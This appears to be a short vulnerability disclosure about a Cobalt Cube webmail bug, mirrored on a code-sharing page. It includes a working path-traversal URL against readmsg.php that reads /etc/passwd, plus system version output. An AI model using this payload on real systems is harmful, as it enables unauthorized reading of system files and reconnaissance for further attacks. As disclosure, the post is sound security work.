?? cobalt.webmail.txt
字號:
I just got a new Cobalt Cube today and I have been poking around at itfor security issues... I noticed this minor issue in the webmail system.Your users are not aloud to have shell access by default however if theymalform their mailbox requests they can read local files with the permsof the webserver. If your users have shell access they will not reallybe gaining anything however this could be used to remotely gatherinformation for a future attack. [admin admin]$ uname -aLinux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown[admin admin]$ cat /etc/issue Cobalt Linux release 6.0 (Carmel)Kernel 2.2.16C7 on an i586http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1-KF
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -